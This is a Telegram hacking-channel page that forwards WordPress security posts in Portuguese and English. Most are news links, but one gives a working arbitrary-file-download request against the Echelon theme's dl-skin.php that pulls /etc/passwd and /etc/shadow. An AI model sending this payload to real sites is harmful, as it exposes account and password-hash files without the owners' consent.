.: PR1V8 :.
4.89K subscribers
499 photos
1 video
471 files
3.2K links
▪️Sobre:
▪️▪️Hacking
▪️▪️Coding
▪️▪️Hacktivism

▫️Twitter: https://twitter.com/0xpr1v8
▫️Acervo: @acervopr1v8
▫️Wiki: https://github.com/0xpr1v8/pr1v8society/wiki/

〰️“Go Beyond Your Limits”〰️
Download Telegram
Forwarded from The Cyber Channel
#exploit #wordpress

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download

http://blog.inurl.com.br/2014/12/tutorialvideo-exploit-wordpress-f-d.html
#Noticia #WordPress #Vul

Sem alarde, WordPress corrige vulnerabilidade perigosa de segurança

Essa vulnerabilidade foi descoberta por pesquisadores da companhia de segurança web Sucuri e foi informada de maneira privada para a equipe do WordPress em 20 de janeiro. Ela fica localizada na API REST da plataforma e permite que invasores não autenticados modifiquem o conteúdo de qualquer post ou página em um site WordPress.

http://idgnow.com.br/internet/2017/02/02/sem-alarde-wordpress-corrige-vulnerabilidade-perigosa-de-seguranca/

🌐 @pr1v8
#WordPress #Vulnerabilidade

Plugin WordPress usado por mais de 300.000 sites é descoberto vulnerabilidade ao ataque SQL Injection

> http://thehackernews.com/2017/06/wordpress-hacking-sql-injection.html

🌐 @PR1V8
#keylogger #wordpress #cloudfare

Keylogger encontrado e quase 5,500 sites WordPress são infectados

O script é carregado no frontend e backend de um site, o que significa que também pode registrar nomes de usuários e senhas ao fazer login no painel de administração do site.

> https://www.bleepingcomputer.com/news/security/keylogger-found-on-nearly-5-500-infected-wordpress-sites/

🌐 @PR1V8